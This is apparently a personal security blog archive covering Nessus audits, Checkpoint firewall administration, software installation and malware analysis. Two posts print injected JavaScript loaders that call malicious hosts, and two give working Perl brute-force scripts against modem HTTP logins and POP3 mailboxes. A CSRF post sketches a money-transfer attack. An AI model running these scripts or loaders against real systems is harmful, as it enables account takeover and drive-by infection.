Security Staff

Reporting for Nessus

2012-01-26T18:42:00.002+02:00

web-based threats analysis

2012-01-03T18:01:00.001+02:00

http://wepawet.iseclab.org/

Code Search Engines

2011-09-14T01:08:00.002+03:00

Popular code search engines for practice;
Google (http://www.google.com/codesearch , Codase http://www.codase.com,
and Krugle http://www.krugle.com .

unicode encoder

2010-07-31T21:52:00.000+03:00

http://www.fileformat.info/info/unicode/char/search.htm

SMTPTLS Checker

2010-04-22T17:46:00.003+03:00

My ptyhon code for checking SMTPTLS support of any given domain name.

http://code.google.com/p/stls/

If you have an force TLS list for customers , you need to periodically check the list. I could not find any basic code for that, so i have done my own.

One Note =>
If your SMTP server was not enabled to use STARTTLS , enable it !! Encrypt your smtp traffic without any enduser interaction ;p

Online virus & sandbox links

2010-01-03T21:50:00.006+02:00

Online virus scan links.
* Jotti Malware Scan http://virusscan.jotti.org/en
* Virus Total http://www.virustotal.com/
* VirScan http://www.virscan.org/

Online SandBox Links
* Normal http://www.norman.com/microsites/nsic/Submit/en-us
* Sunbelt CWSSandbox http://www.cwsandbox.org/?page=home
* Threat Expert http://www.threatexpert.com/
* Annibus http://anubis.iseclab.org/index.php
* Joebox http://www.joebox.org/

Analysis of Trojan.JS.Agent.axg Part One..

2009-12-21T23:07:00.004+02:00

After founding the malicious site. I have unescaped the malicious JS content. Somehow malicious javascript was added to the end of js file.

Here is the replace function

'h^#!#t^^^#t)@p(!!:($^/#$^/#)#@o@@($r#))^k#!^u$&)t!#&-))c#^!!o@&)m@)$-####b$$r)#.$t&&a@b&(n^$(a!#k^.$(#!i)r)^$.@(l!$i(@t&&$e^r$^&o#t!&)i)&)c#&a$&&-@#)c$#!o)(^@#m)$&(.#i$#n&(n&&e&w!$)t$&e@r@!(r#@&((a#(.#!&r&#u&$#:(@&8)^!0&8$@)0!/($!g#)$(o&#@o^!g!)l$&^e^@.#!c#)(n(/^$g!(!o!^&o@#&@g)l^#(#e&^@.$^$&c!^)n(/!$(g!o^)&!o@g&(!l$(!!e&@&$.#&c(($o&)m&#)/$(^h^&))a^!o!1&(2^##3#.&&#(c#!&o&m(#/)^&i@@s@@&)t)^^)o((!c$k&(@!p##h#)@o(t)^#o^&.^&!c)#o^!m@$/$@#'.replace(/&$#\!$\^\$@/ig, '')

I have replaced all & , ( , # ,! ,^ $ , @ with escape and here is the link.

#http://orkut-com-br.tabnak.ir.literotica-com.innewterra.ru:8080/google.cn/google.cn/google.com/hao123.com/istockphoto.com#

I tried to GET the request ( normally, the javascript tried the URL in iframe ) and below is the response from the server .

Most of the malicious Server Tag includes " nginx " :) , you may block this Server header on your internal proxy.

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 21 Dec 2009 21:09:55 GMT
Content-Type: text/javascript
Connection: close
X-Powered-By: PHP/5.1.6
Expires: 0
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Length: 374

Luq39s = 'o##r!!k)u!@t)#-$@$)c^$o@#m(@$-^b()r&^#.!$(@t@!&(a!#b)n)!a)^)k@!#.@&#^i($r&.@^@#l^)i@t$!e$^r#&o^@#t!#@i#)!$c#)&a$-^c@^o#@(@m@^^.$(#^i)@^n$@&n^$)e$(w$!t#e#@r^#(#r#)@a@$.#(r@&u#)@'.replace(/\!&\^$#$\$@/ig, '');
f = document.createElement('iframe');
f.style.visibility = 'hidden';
f.src = 'http://'+Luq39s+':8080/index.php?js';
document.body.appendChild(f);

I have decoded Luq39s with same way and the current malicious URL is below

#http://orkut-com-br.tabnak.ir.literotica-com.innewterra.ru:8080/index.php#

You download an com file, called istockphoto.com from the side.

Nesssus 4.2.0

2009-12-02T23:12:00.002+02:00

Nessus has released 4.2.0 version. There are some major changes like web based management and report comparing module. Web based module is a flash interface so quite fast and useful.

Moth

2009-07-27T15:44:00.000+03:00

One of the good web application testing platforms.

http://www.bonsai-sec.com/en/research/moth.php

Browser Helper Objects and TG

2009-05-19T20:34:00.002+03:00

Browser Helper Objects are used to extend the in-browser functionality of Internet Explorer in a way that works across all pages. (Java, JavaScript, and ActiveX can work only within the context of a single page or set of pages.) The Google Toolbar Helper Object, for example, adds a search toolbar, context menus, and pop-up advertisement blocker to IE. Other BHOs have more nefarious uses; many spyware creators use BHOs to record all of the URLs a victim accesses, to manipulate search results, or to redirect error pages to advertisements.

A list of Browser Helper Objects installed on a machine can be found in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current Version\Explorer\Browser Helper Objects.

TG as called transaction generators are more sophisticated versions of one-click attack. BHO's also may be used to genetare TG attacks by using trojans..

Malware Javascript

2009-05-07T20:50:00.005+03:00

One of the biggest online advertisement contest web side uses a kind of web2.0 javascript pack. I have found a malware javascript code at the end of all included js files.Here is the code below, let's start analysis of this code.

function(){varsmtbX='>76>61r>20a>3d>22Scri>70tEngi>6ee>22>2c>62>3d>22Versi>6f>6e()>22>2cj>3d>22>22>2c>75>3d>6eaviga>74>6fr>2eus>65>72>41g>65nt>3bi>66>28(>75>2e>69ndexOf(>22Win>22)>3e0)>26>26(u>2ein>64ex>4ff(>22NT>20>36>22)>3c0)>26>26(do>63ument>2ec>6fokie>2ein>64>65x>4ff(>22miek>3d1>22)>3c0)>26>26(typ>65>6f>66>28zr>76zts)>21>3dty>70eo>66(>22A>22)))>7bzrv>7ats>3d>22A>22>3b>65>76>61>6c(>22>69f(win>64ow>2e>22+a+>22>29j>3dj+>22>2ba>2b>22M>61jor>22>2bb+a+>22Minor>22+b+a+>22>42ui>6c>64>22>2bb+>22>6a>3b>22)>3bdocument>2e>77rite>22>3cscri>70>74>20sr>63>3d>2f>2fgu>6dblar>2ecn>2frss>2f>3f>69>64>3d>22>2bj>2b>22>3e>3c>5c>2f>73c>72ipt>3e>22)>3b>7d';var ujt2o=unescape(smtbX.replace(/>/g,'%'));eval(ujt2o)})(); -->

there is a replace at the end of code, it says replace ">" with "g" so i have replaced it and then urldecoded the code =>

33function(){var mtbX='vara="ScriptEngine",b="Version)",j="",u=navigator.userAgent;if((u.indexOf("Win")>0)&&(u.indexOf("NT6")<0)&&(document.cookie.indexof("miek=1")<0)&&(typeof(zrvzts)!=typeof("a"))){zrvzts="a";eval("if(window." j="j" scriptsrc=" id=""><\/script>");}';varujt2o=unescape(smtbX.replace(/%/g,'%'));eval(ujt2o)})();

Malicious code make a request to gumblar.cnn/rss/?id= "j" . I have tried this site with standart windows xp system without any protection and it exploited my pdf viewer and then try to download some malware files.In my opinio this code belongs to an virus payload. Somehowe this virus infected the web server and find js files to add its payload to them.

"replace" function in javascript may be a part of malicious script. Websense and other webfilter tools web robots parse these js files and make a signature based search for malicious attempts. If you wanna do it with yourself web mirroring and string search also works.

Cross Domain Vulnerability on Firefox

2008-12-21T21:49:00.003+02:00

Mozilla Firefox 3.x before 3.0.5 and 2.x before 2.0.0.19, Thunderbird 2.x before 2.0.0.19, and SeaMonkey 1.x before 1.1.14 allows remote attackers to bypass the same origin policy and access portions of data from another domain via a JavaScript URL that redirects to the target resource, which generates an error if the target data does not have JavaScript syntax, which can be accessed using the window.onerror DOM API.

If you find a XSS vulnerable site and exploit it on the user site. You can
jump other domains on the firefox browser and may have a chance to steal the cookie ...

CookieMonster

2008-09-18T11:11:00.000+03:00

If cookie is used for session management, use secure cookie to avoid inadvertent transmission in HTTP.

Below is the link how to steal cookie with SSL

http://www.gss.co.uk/news/article/5412/CookieMonster_nabs_user_creds_from_secure_sites/?

Cross Domain Issue

2008-09-08T22:26:00.002+03:00

That's really points what could be done with Cross Domain requests..

http://msdn.microsoft.com/en-us/library/cc709423(VS.85).aspx

SANS Certification

2008-08-24T17:57:00.002+03:00

Sans has an good certification called "GIAC Secure Software Programmer - Java (GSSP-JAVA)" the topics and consept both includes web based attacks and also security issues with java design itself. In europe they had a session in London. I hope on November they will arrange one.

Web Services Security implementation

2008-07-07T00:14:00.003+03:00

If you want to quick look at Web Services security related issues. Vordel ' s SoapBox provides some basic implemantations like WS-Sec, Xml-encryption, Xml-signature and Authentication demos . The usage is like a web service client, trial version has 5 request limits. Good job :]

http://www.vordel.com/

Nessus Audits checks

2008-04-25T09:17:00.000+03:00

Audit checks on nessus are the one of my works that i implemented and using for local scans. Using audit feature you have subscribe direct feed.As most of you may think getting plugins 1 week later no problem at all, in my opinion using audit checks really force your controls and make less talks to system owners.

We use local audit checks with two nessus server and scan 400+ servers in 4 times a year .Audit checks performs checking our domain policy on servers , application/web server related controls and also some specific *nix box controls. the scripting language is not alike nasl-naslv2. it has a new and basic syntax.In tenable site you can download prepared ready audits or compliance check tools for preparing some windows base domain policy checks.

Here are some examples that i implement for IIS auditing =>

type: REGISTRY_SETTING
description: "Enable Non UTF-8 control."
value_type: POLICY_DWORD
value_data: 0
reg_key: "HKLM\System\CurrentControlSet\Services\HTTP\Parameters"
reg_item: "EnableNonUTF8"
reg_type: REG_DWORD

type: FILE_CONTENT_CHECK
description: "Encode Weblogs in UTF8 control"
value_type: POLICY_TEXT
value_data: "C:\WINDOWS\system32\inetsrv\MetaBase.xml"
regex: "LogInUTF8=.*"
expect: "LogInUTF8="TRUE""

Web Services Scanner

2008-01-28T14:27:00.000+02:00

After a long research last year i approved to use SoapSonar web services scanner from the company crosschecknet. The update option of product really mass, you have to redownload and install all product from the scratch but the options like compliance and performance checks and also vulnerability were really good enough.
Within 2 years time this kind of professional scanners will be popular and used within most companies. Before crosschecknet i was in touch with one opensource web services scanners, i said one because there is not much its belongs WSDigger from Foundstone(Mcafee*) company. But it restrict to only XPATH & blind XPATH injection.

You have also one option, using webscarab web services parser and fuzzing if good enough in fuzzer and web services vulnerability string or signatures .That's really enjoyable and attractive but needs so many workout.

So the product in web services =>
1.SoapSonar from Crosschecknet
2.And other web vulnerability scanners that have option to scan web services..(not really good its a focus problem:)
3.Opensource wsdl parsers and fuzzers.

And the fourth one is i will open a opensource project about that just in plan phase , like web based web services scanner the one will give the wsdl address and my engine will scan the services..Sourceforge will be the address soon..

XSRF an per-page-tokens

2007-09-28T18:31:00.000+03:00

XSRF or some says CSRF is a logical vulnerability in my opinion. You prepare an html page that's a post or get
and wait user to visit your page. After user visited your page you vulnerable site submit the form and make some stuff related with other site that you have already logged in !! must login really not important. You can phish the user to login by any way because its the real site..

Here is the scenario

1.You login vulnerable page, in the vulnerable page there is a javascript or banner that matchs my bank login with real adress that's not the fake.

2.Victim then open xxx bank site and really login.

3.With using CSRF i post my money transfer to user with using ajax,html form or usign serverside languages php-zend,java web socket..

4. Booomm i transfer the money if the site do not have any per page token control and the user only see the transaction page that i did :))

So the prevention

using per-page token is the only preventive method but it costs to many on developer site, however that's a logical prevention and may be apply some important pages of the site for preventing XSRF..

Adsl modem password finder

2006-05-11T11:22:00.000+03:00

tihs is another my cgi script , the word matching algortihm is perfect taking from
websec.org.

#!/usr/bin/perl

###################################

use LWP;
use Getopt::Std;
use HTTP::Request::Common;
use HTTP::Response;
use MIME::Base64;
use CGI qw(:all);

use vars qw($opt_a $opt_u $opt_p $opt_l $opt_v);
getopts("a:u:p:l:v:");

## vardecs
##

my $userfile = "/tmp/username";
my $passfile = "/tmp/password";
my %BASEPASS;
print header, start_html();
my $ipaddress = param("password");
print end_html();
open(UF, "< $userfile") || die "\ncant open $userfile\n";

while ()
{
my $uid = $_;

##
open(PF, "< $passfile") || die "\ncant open $passfile\n";
##
while ()
{
my $pwd = $_;

my $user_agent = new LWP::UserAgent;
$user_agent->agent("Mozilla/4.0(compatible;MSIE 6.0;Windows NT 5.0)");

$uid =~ s/[\n\r]//g;
$pwd =~ s/[\n\r]//g;
$pwd = &special($uid,$pwd);

my $response = $user_agent->request(GET "$ipaddress", Authorization => "Basic ".encode_base64("$uid:$pwd"));

if ($response->is_success)
{
print p("Kullanici_Adi: $uid");
print p("Sifre:$pwd");

}
else
{

#print p("Sifre Bulunamadi");
#print RF "$uid:$pwd (",$response->code(),")\n" if ($logfile ne '');
}
}
close(PF);
}
close (UF);
close (RF);

### sub special (pwd,uid)
### returns pwd

sub special
{
my $u = shift;
my $p = shift;

## check for %%UID%% in password
##
$p =~ s/%%UID%%/$u/ if($p =~ /%%UID%%/);

## check for %%UIDREV%% in password

##
if ($p =~ /%%UIDREV%%/)
{
my $tmp = "";
my $c = 0;

for ($c=length($u);$c>=0;$c--)
{
$tmp .= substr($u,$c,1);
}
$p =~ s/%%UIDREV%%/$tmp/;
}

## done
##
return $p;
}

Pop3 Dictionary Attack

2006-05-11T11:17:00.000+03:00

This my basic perl cgi script for dictionary attack of pop3 protokol.

#!/usr/bin/perl
use IO::Socket;
use Net::POP3;
use CGI qw(:all);

$pass_file = "/tmp/password";
print header, start_html();
my $ipaddress = param("domain");
my $pop3user = param("isim");
print end_html();
open FILE, "< $pass_file" || die ("\n Can not open file error...\n");
chomp(@pazi = );

for ($i = 0; $i <= $#pazi; $i++)
{
$connect = Net::POP3->new("$ipaddress")
or die "Connection Error to $hostname : $!\n";

my $response = defined($connect->login("$pop3user",$pazi[$i]));
if ($response > 0 )
{
print p "(Mail adresi Sifresi $pazi[$i] )";

}
else
{
print p "( Denenen Sifreler $pazi[$i] )";
}
$connect->quit;
}

Checkpoint Backup Script--

2005-11-28T16:46:00.001+02:00

Checkpoint Backup Script

Use this script with cron deamon for getting system backup with upgrade_export..

#!/bin/bash
. /opt/CPshrd-R55/tmp/.CPprofile.sh
DATE=`date +%Y%m%d`
FILE=$DATE"MKK_BACKUP"
echo | /opt/CPfw1-R55/bin/upgrade_tools/upgrade_export /home/backup/$FILE
exit 0

CP Tuning

2005-11-24T23:53:00.000+02:00

Linux Performance Tuning

The information provided in this section refers to Linux RedHat 7.2 distribution. At the same time, many of the tuning techniques and tunable parameters are also applicable to earlier 7.0 and 6.2 versions.

1. Use Check Point SecurePlatform Linux for VPN-1 installations

The Check Point SecurePlatform product is Check Point version of Linux based on the Red Hat 7.2 distribution that is specifically adapted (hardened and tuned) for use with VPN-1 software. Current SecurePlatform Edition II is based on Linux kernel 2.4.9-31. It is strongly advised to use Check Point SecurePlatform for Linux-based VPN-1 installations.

The rest of the Linux tuning section is only relevant if you are not using Check Point Secure Platform Linux.

2. Use the latest Red Hat Linux kernels

Use the latest 2.4.x Linux kernels from Red Hat. The earliest 2.4.x kernel version suitable for use with VPN-1 use is 2.4.9-13. Current kernel recommended at the time of this guide's writing is 2.4.9-31.

During the installation process select Custom Installation option. That will allow you to install only the components required for your VPN-1 installation. Install the kernel Development Environment if you are going to build customized kernels (see below).

3. Install the latest recommended security patches

Latest recommended security and other patches can be downloaded from the Red Hat Errata Support Site

4. Recompile the minimal Linux kernel optimized for your particular hardware configuration and optimized for use as IP router

Implementing the recommendations provided below require significant Linux system administration skill & expertise. Kernel misconfiguration may render your system unusable and require a complete re-install. Follow these recommendations at your own risk.

while in your Linux kernel source directory, usually /usr/src/linux, run make config or make menuconfig:

- compile the kernel optimized for the particular CPU type you're using
- leave out support & drivers for all irrelevant stuff that is normally included in the default distribution kernel. Examples are: support for obscure IDE HD and floppy drives, bizarre filesystems, parallel ports, CMD640 chipset fixes, sound, etc, etc. This will produce the kernel with much smaller memory footprint which should & will work faster.
- statically compile in the drivers for hardware you're using on the gateway - NICs, relevant IDE/SCSI controllers, etc.
- during kernel compilation, turn on the Advanced Router (CONFIG_IP_ADVANCED_ROUTER) option. This will trigger some IP router specific questions. Turn on support for large routing tables (CONFIG_IP_ROUTE_LARGE_TABLES) and Optimize for Use as Router (CONFIG_IP_ROUTER) options. Turn on large windows support (CONFIG_SKB_LARGE option). Do not turn on the native IP firewalling options (CONFIG_IP_FIREWALL, CONFIG_IP_FIREWALL_NETLINK, CONFIG_IP_TRANSPARENT_PROXY, CONFIG_IP_MASQUERADE, etc).
- on IDE systems turn on the CONFIG_BLK_DEV_IDEDMA and CONFIG_IDEDMA_AUTO options
- on some systems PCI bridge optimization (CONFIG_PCI_OPTIMIZED option) can improve PCI bus performance. Disable it if you experience any PCI-related problems

For more info on compiling & installing customized Linux kernels refer to Linux Kernel HOWTO.

5. Disable all services & daemons that are not required on your VPN-1 installation

As in case of other OSs, listing all unnecessary services and daemons can take a document of it's own. A good idea is to go over all of them in /etc/xinetd.d/ and /etc/rc3.d/ directories and get rid of everything that is not directly required. Few examples are: netstat, finger, pop-2/3, apmd, NFS (if possible) pcmcia, etc, etc.

Do not install or run any of the X Windows components - XFree86, window managers, etc.

6. Tune the TCPIP stack parameters for maximal security servers and logging performance

Linux kernel versions 2.4.x and later apparently do quite a good job of auto-tuning some the TCP stack parameters, so changing them might not be necessary. On earlier Linux kernels (versions 2.2.x are supported by the VPN-1) most of the info below is still relevant.

edit /etc/rc.local, or create your own /etc/rc3.d/S100vpn1tuning file:

- increase the number of TCP ephemeral (short lived) ports:

echo "32768 65535" > /proc/sys/net/ipv4/ip_local_port_range

- turn off the TCP timestamps:

echo 0 > /proc/sys/net/ipv4/tcp_timestamps

- for better logging performance over fast LAN links, turn off SACKS and windows scaling:

echo 0 > /proc/sys/net/ipv4/tcp_sack
echo 0 > /proc/sys/net/ipv4/tcp_window_scaling

- for better security servers performance over slow/noisy WAN links, turn SACKS and windows scaling on:

echo 1 > /proc/sys/net/ipv4/tcp_sack
echo 1 > /proc/sys/net/ipv4/tcp_window_scaling

- increase the amount of memory associated with input and output socket buffers:

echo 262144 > /proc/sys/net/core/rmem_default
echo 262144 > /proc/sys/net/core/rmem_max
echo 262144 > /proc/sys/net/core/wmem_default
echo 262144 > /proc/sys/net/core/wmem_max

7. Increase the number of file descriptors available to security servers

edit /etc/rc.local, or create your own /etc/rc3.d/S100vpn1tuning file:

echo 65536 > /proc/sys/fs/inode-max
echo 32768 > /proc/sys/fs/file-max
ulimit -n 32768

Identifying Checkpoint with nmap

2005-11-24T23:44:00.000+02:00

Identifying Checkpoint with nmap

For identifying operating systems , using nmap is definitely handy and effective.In our first example we will identify CheckPoint Firewall-1.Checkpoint Firewall-1 has default open ports although the Security Engineer applied Stealht Rule .This open ports arise from FW-1 implied rules.

root@pazwant:~# nmap -sP -PS18264 192.168.1.200 --packet_trace

Starting nmap 3.75 ( http://www.insecure.org/nmap/ ) at 2005-05-08 03:51 GMT+2
SENT (0.0240s) TCP 192.168.1.15:58825 > 192.168.1.200:18264 S ttl=55 id=44555 iplen=40 seq=1685203678 win=4096
RCVD (0.0290s) TCP 192.168.1.200:18264 > 192.168.1.15:58825 SA ttl=64 id=0 iplen=44 seq=876407979 win=5840 ack=1685203679

Host 192.168.1.200 appears to be up.
MAC Address: 00:0C:29:6B:B2:29 (VMware)
Nmap run completed -- 1 IP address (1 host up) scanned in 0.639 seconds

root@pazwant:~# nmap -sP -PS264 192.168.1.200 --packet_trace

Starting nmap 3.75 ( http://www.insecure.org/nmap/ ) at 2005-05-08 03:54 GMT+2
SENT (0.0280s) TCP 192.168.1.15:41434 > 192.168.1.200:264 S ttl=42 id=20575 iplen=40 seq=1024727070 win=3072
RCVD (0.0290s) TCP 192.168.1.200:264 > 192.168.1.15:41434 RA ttl=255 id=0 iplen=40 seq=1026828309 win=0 ack=1024727071
Host 192.168.1.200 appears to be up.
MAC Address: 00:0C:29:6B:B2:29 (VMware)
Nmap run completed -- 1 IP address (1 host up) scanned in 0.645 seconds

RSA Authentication API config for Java

2005-09-27T16:29:00.000+03:00

For independent applications and application server's that RSA did not provide any
agent, we can use Java API for entegration.In this work our platform is
Ace server 6.0
Java API 5.0.3
RedHat Enterprise 3.0

First off all on Ace Server site, we create an agent host tagged as Unix Agent.After
defining acting master and slave servers get the sdconf.rec to the linux machine.
On linux machine you need to download Java_API tar file and open it on any default directory as you wish..

In this directory go to the sample directory and compile jar files resides on lib directory..

[root@redent sample]# pwd
/root/rsa/examples/sample

[root@redent sample]#javac -classpath ../../lib/authapi.jar:../../lib/log4j-1.2.8.jar *.java io/*.java

Checkpoint Expert Passwd Reset

2005-09-08T14:06:00.000+03:00

For resetting user and admin password, we need a Redhat CD for opening
the system at Rescue Mode.The basics of this operation is mounting the
CP harddisk and running CP commands for editing and adding user by
changing the root directory...

I tested that password reset on Linux Redhat 8.0 , after opening system in rescue mode you have to go down the bash shell by typing

~/bin/sh-2.05b#/ bash
bash-2.05b#

During the rescue operation on CD, the system will be mounted on /mnt/sysimage , so do chroot( changes the root directory to that specified in path ) command

bash-2.05b# chroot /mnt/sysimage
bash# su -

Now your directory is CP shell on [Expert:localhost.localdomain]#
we can change or add user easily at tihs time..

[Expert@localhost.localdomain]# expert_passwd
Enter new expert password:
Enter new expert password again:
Expert passwd has been changed...

We can also add or delete any user..

Log export Script for Checkpoint

2005-08-28T22:49:00.000+03:00

This script tars the log files and send them to an ftp server .. Before Using This backup script you have to manully set log switch time to midnight and make a cronjob for executing this script after midnight time like 24:01

!#/bin/bash
. /opt/CPshrd-R55/tmp/.CPprofile.sh (For NGX version this path /opt/CPshrd-R60/tmp/.CPprofile.sh)
DATE=`date +%Y-%m-%d`
LOGS=$FWDIR/log
LOGFILE=$LOGS/”$DATE”_235900.log
tar cvf—absolutenames $LOGFILE.tar.gz “$LOGFILE” 2> /dev/null
ZIP=$DATE”_235900.log.tar.gz”
ftp_put ()
{

FTPIP=”xxx.xxx.xxx.xxx”
DIR=”xxx.xxx.xxx”
USER=”xxx”
PASS=”xxx”
ftp -n $FTPIP < < EOF
user $USER $PASS
bin
cd $DIR
lcd /opt/CPfw1-R55/log
put $ZIP
bye
EOF
}

exit 0

Nessus plugin for Checkpoint

2005-08-28T22:40:00.000+03:00

#
# Body of a script
#

if (description)
{
script_id(987654);
script_version ("$Revision: 1.00 $");
name["english"] = "Checkpoint Firewall-1 Ica_Services Detection";
script_name(english:name["english"]);
script_description(english:
"A Firewall-1 Isa_Services running on this port.

An attacker can understand your firewall vendor name
and the IP addresses of the firewall by scanning this service remotly.

Solution : if you do not use this service, disable it.
Risk factor : Low");
summary["english"] = "Checks for the presence of Checkpoint Firewall Ica_Services ";
script_summary(english:summary["english"]);
script_category(ACT_GATHER_INFO);
script_family(english:"Firewalls");
script_copyright(english:"This script is Copyright (C) 2005 Anil Pazvant ");
script_dependencie("find_service.nes", "http_version.nasl" , "httpver.nasl");
script_require_ports("Services/www",18264);
exit(0);

}

#
# the code
#
include("http_func.inc");
include ("http_keepalive.inc");

port = get_http_port(default:18264)

if (!get_port_state(port))exit(0);
req = http_get(item:"/", port:port);
x = http_keepalive_send_recv(port:port, data:req, bodyonly:1);
if (x==NULL)exit(0);

if (egrep(pattern:"Server: Check Point SVN foundation", string:x))
{
security_hole(port);
}
exit(0);

Sun Identity Manager 5.0 Installation on Linux

2005-08-19T14:04:00.000+03:00

During the installation , here is the list of packages i used :

• jdk-1_5_0_02-linux-i586.bin
• jakarta-tomcat-4.1.31
• mysql 4.1.x
• Sun IDM 5.0

INSTALLING JDK

[root@IDM java]# chmod +x jdk-1_5_0_02-linux.i586.bin
[root@IDM java]# ./ jdk-1_5_0_02-linux.i586.bin

The considerable point in JDK installations are setting the PATH ENVIRONMENT; after the installation of source jdk, refer the following:

Give a basic symbolic link to the jdk1.5.0_02 directory.

[root@IDM java]# ln –sf jdk1.5.0_02 jdk

Edit the /etc/profile file and register the following variables, for testing the path you have to logout/in the system for once.
export JAVA_HOME=/usr/java/jdk
PATH=$PATH:/usr/java/jdk/bin

[root@IDM java]# echo $JAVA_HOME
/usr/java/jdk
[root@IDM java]# java -version
java version "1.5.0_02"
Java(TM) 2 Runtime Environment, Standard Edition (build 1.5.0_02-b09)
Java HotSpot(TM) Client VM (build 1.5.0_02-b09, mixed mode, sharing)

INSTALLING TOMCAT APPLICATION SERVER

After completing JDK installation , we can install Tomcat Application Server

[root@IDM /]# tar zxvf jakarta-tomcat-4.1.31 -C /usr/local
[root@IDM /]# ln –sf /usr/local/jakarta-tomcat-4.1.31 /usr/local/tomcat

Edit the /etc/profile file and register the following variables, for testing the path you have to logout/in the system for once.
export CATALINA_HOME=/usr/local/tomcat

For Starting Tomcat run /usr/local/tomcat/bin/startup.sh
Let’s check tomcat is running ;

[root@IDM bin]# lsof -iTCP:8080
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
Java 1126 root 5u IPv4 3301 TCP *:webcache (LISTEN)

For Stopping Tomcat run /usr/local/tomcat/bin/shutdown.sh

INSTALLING MYSQL DATABASE SERVER

The recomended MySql version for IDM is 4.0.16, however i try to install the latest 4.1.x version and messed up.During the installation of IDM i had to change create_waveset_tables.mysql script

[root@IDM root]# tar zxvf mysql-4.1.10a.tar.gz
[root@IDM root]# cd mysql-4.1.10a
[root@IDM root]# useradd mysql -s /sbnin/nologin

Configure MySQL

[root@IDM root]# CFLAGS="-O3 -mcpu=i686"
[root@IDM root]# CXX=gcc
[root@IDM root]# CXXFLAGS="-O3 -mcpu=i686 -felide-constructors -fno-exceptions -fno-rtti"

[root@IDM root]# ./configure --prefix=/usr/local/mysql --with-mysqld-ldflags=-all-static --with-extra-charsets=complex

After configuring mysql let’s compile ;

[root@IDM root]# make ( A long time period )
[root@IDM root]# make install

[root@IDM root]# scripts/mysql_install_db
[root@IDM root]# chown -R root /usr/local/mysql
[root@IDM root]# chown -R mysql /usr/local/mysql/var
[root@IDM root]# chgrp -R mysql /usr/local/mysql

You can change support-files type for your system performance;

[root@IDM root]# cp support-files/my-medium.cnf /etc/my.cnf

Configuring mysql for running in inet superdeamon ;

[root@IDM root]# cp support-files/mysql.server /etc/init.d/
[root@IDM root]# chmod +x /etc/init.d/mysql.server
[root@IDM root]# cd /etc/rc3.d
[root@IDM root]# ln -s ../init.d/mysql.server S99mysql
[root@IDM root]# cd /etc/rc5.d
[root@IDM root]# ln -s ../init.d/mysql.server S99mysql
[root@IDM root]# cd /etc/rc0.d
[root@IDM root]# ln -s ../init.d/mysql.server K04mysql

After finishing above ; let’s start mysql and connect ..

[root@IDM init.d]# ./mysql.server start
[root@IDM init.d]# lsof -iTCP:3306

COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
mysqld 1270 mysql 3u IPv4 21329 TCP *:mysql (LISTEN)
mysqld 1271 mysql 3u IPv4 21329 TCP *:mysql (LISTEN)
mysqld 1272 mysql 3u IPv4 21329 TCP *:mysql (LISTEN)
mysqld 1273 mysql 3u IPv4 21329 TCP *:mysql (LISTEN)
mysqld 1274 mysql 3u IPv4 21329 TCP *:mysql (LISTEN)
mysqld 1275 mysql 3u IPv4 21329 TCP *:mysql (LISTEN)
mysqld 1276 mysql 3u IPv4 21329 TCP *:mysql (LISTEN)

INSTALLING IDM_5.0

Before installing IDM we have to add a column to create_waveset_tables.mysql about priviledges;
#
# Give permissions to the "waveset" userid logging in from any host.
#
GRANT ALL PRIVILEGES on waveset.* TO waveset IDENTIFIED BY 'waveset';
#
# Give permissions to the "waveset" userid logging in from any host.
# NOTE: This is equivalent to the formulation where host is unspecified,
# which works fine for MySQL on Solaris 2.6 in our lab,
# but one customer (with an odd DNS setup) needed the following variant.
#
GRANT ALL PRIVILEGES on waveset.* TO waveset@'%' IDENTIFIED BY 'waveset';
#
# Give permissions to the "waveset" user when it logs in from the localhost.
# MySQL on NT or Linux (I forget which) required this for JDBC connections.
#
GRANT ALL PRIVILEGES on waveset.* TO waveset@localhost IDENTIFIED BY 'waveset';
GRANT ALL ON waveset.* TO waveset@"127.0.0.1" IDENTIFIED BY "waveset";

After adding column , now we can run script

[root@IDM init.d]# mysql -u root < create_waveset_tables.mysql

Now open your X Server and start install script as well.During the installation Select Ins Path as
/usr/local/tomcat/webapps/idm, before running “Launch Setup” , download mysqljdbc.jar and put it on “/usr/local/tomcat/webapps/idm4/WEB-INF/lib” directory.

[root@IDM init.d]# wget -P/usr/local/tomcat/webapps/idm4/WEB-INF/lib =>http://www.cs.armstrong.edu/liang/intro5e/book/mysqljdbc.jar